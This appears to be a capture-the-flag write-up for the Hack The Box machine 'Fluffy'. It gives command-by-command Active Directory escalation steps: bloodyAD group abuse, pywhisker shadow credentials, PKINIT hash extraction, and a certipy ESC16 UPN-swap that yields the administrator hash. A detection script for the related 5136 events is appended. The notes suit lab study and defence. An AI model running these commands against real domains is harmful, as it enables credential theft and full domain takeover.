HTB_Fluffy
Windows (Easy)
Summary
user.txt
smb_shares, pdf -> CVE-2025-24071 -> shadow credentials (GenericAll + GenericWrite)
GenericAll (on Group): add the user to the group
python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx' set owner 'xxx' 'p.agila'
python ~/htb/tools/bloodyAD/blo*.py --host dc01.fluffy.htb -d "fluffy.htb" --dc-ip 10.10.11.69 -u 'p.agila' -p 'pxx' add groupMember 'pxx' 'p.agila'
GenericWrite: Shadow Credentials
python ~/htb/tools/pywhisker/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'pxx' --target "winrm_svc" --action "add"
python ~/htb/tools/PKINITtools/gettgtpkinit.py 'fluffy.htb/winrm_svc' -cert-pfx 'IW?.pfx' -pfx-pass 'L4???' winrm_svc.ccache
export KRB5CCNAME=`pwd`/winrm_svc.ccache
python ~/htb/tools/PKINITtools/getnthash.py -key xxxxx fluffy.htb/winrm_svc
When running bloodhound as winrm_svc, authenticating with hashes errors out, so use Kerberos instead, like this:
sudo ntpdate fluffy.htb
sudo impacket-getTGT 'fluffy.htb/p.agila:pxx' -dc-ip 10.10.11.69
export KRB5CCNAME=`pwd`/p.agila.ccache
root
Running bloodhound as winrm_svc shows GenericAll over Administrator, but forcing a password change failed; it also shows the ca_svc user with the same rights, and because of the name it points toward a CA-related route. Tool: certipy
certipy find -vulnerable -u [email protected] -hashes xxx -dc-ip 10.10.11.69
certipy needs version 5.0.2; my existing 4.8.2 did not find the vuln, i.e. ESC16
[-] Got error while requesting certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA.Woul
The -template value is not ESC16; it is the User template
But that way what you get is still ca_svc.pfx
You first need to change ca_svc's UPN to administrator, done through p.agila, who was added to the group earlier
certipy account -u '[email protected]' -p 'pxx' -dc-ip 10.10.11.69 -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update
[-] Received error: 000021C8: AtrErr: DSID-03200E96, #1: 0: 000021C8: DSID-03200E96, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 90290 (userPrincipalName)
I did not solve this at the time and stopped; later it worked again...
The certipy part is mainly finding ESC16, then overwriting the current user's UPN with administrator
Mainly:
certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
... userPrincipalName : administrator
Otherwise certipy req still requests the current user's pfx, which is useless
# overwrite the upn
certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update
# request the pfx
certipy req -u [email protected] -hashes xx -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
# set the upn back to the original
certipy account -u '[email protected]' -p 'pxx' -dc-ip '10.10.11.69' -target 'fluffy.htb' -upn 'ca_svc' -user 'ca_svc' update
# get the hash
sudo ntpdate fluffy.htb
certipy auth -u administrator -domain fluffy.htb -pfx 'administrator.pfx' -dc-ip '10.10.11.69'
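As an added defender-side example (not part of the original writeup): the two directory writes this chain depends on, the userPrincipalName overwrite to "administrator" on ca_svc and the msDS-KeyCredentialLink write on winrm_svc, both show up on the DC as Security event 5136 (directory service object modified) when directory object change auditing is enabled. The script below flags both patterns in a few constructed records; the flattened field names and the OperationType code for "Value Added" are assumptions modelled on the 5136 schema.

```python
import re

PRIVILEGED_NAMES = {"administrator"}
WATCHED_ATTRIBUTES = {"userprincipalname", "msds-keycredentiallink"}
VALUE_ADDED = "%%14674"  # assumed 5136 OperationType code for "Value Added"

# Constructed sample 5136 records (not from the box), flattened to the fields needed.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "p.agila",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "userPrincipalName",
     "AttributeValue": "administrator", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "p.agila",
     "ObjectDN": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "AttributeValue": "B:828:...:CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "j.doe",
     "ObjectDN": "CN=j.doe,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "description",
     "AttributeValue": "updated", "OperationType": VALUE_ADDED},
]

def object_cn(dn):
    """First CN component of a distinguished name, lower-cased."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).lower() if m else ""

def check_event(ev):
    """Return a finding string for one 5136 record, or None if it looks benign."""
    if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
        return None
    attr = ev["AttributeLDAPDisplayName"].lower()
    if attr not in WATCHED_ATTRIBUTES:
        return None
    target = object_cn(ev["ObjectDN"])
    actor = ev["SubjectUserName"].lower()
    if attr == "userprincipalname":
        # ESC16 pattern: the UPN's user part names a privileged account
        # but is being set on a different object.
        upn_user = ev["AttributeValue"].split("@")[0].lower()
        if upn_user in PRIVILEGED_NAMES and upn_user != target:
            return f"upn-spoof: {actor} set UPN '{ev['AttributeValue']}' on {target}"
        return None
    # Shadow-credential pattern: a key credential added to an account by a
    # different principal (self-enrolment writes its own object).
    if actor != target:
        return f"shadow-credential: {actor} added msDS-KeyCredentialLink on {target}"
    return None

def analyze(events):
    """Run check_event over a list of records and keep the findings."""
    return [f for f in (check_event(e) for e in events) if f]
```

Run `analyze(SAMPLE_EVENTS)` against the constructed records to see the two findings; real deployments would feed it parsed 5136 events and tune PRIVILEGED_NAMES to the tier-0 accounts in the domain.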
References
wp:
https://4xura.com/ctf/htb/htb-writeup-fluffy/
Other
https://github.com/0x6rss/CVE-2025-24071_PoC
https://github.com/ly4k/Certipy.git
certipy only supports ESC1 through ESC16 from v5.0.0 onward
This will fetch and install the latest release. It's a good idea to periodically update, as new releases may add support for newly discovered vulnerabilities (e.g., ESC9+ techniques) or improved features. At the time of writing, Certipy v5.0.0 is the latest version (which supports ESC1 - ESC16).
or pip install -U certipy-ad
Just upgrade
After upgrading, the certipy command replaces the old one; if you add -ad it is still the original version
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
Originally published on the WeChat official account 羽泪云小栈: Se8_Fluffy (approach)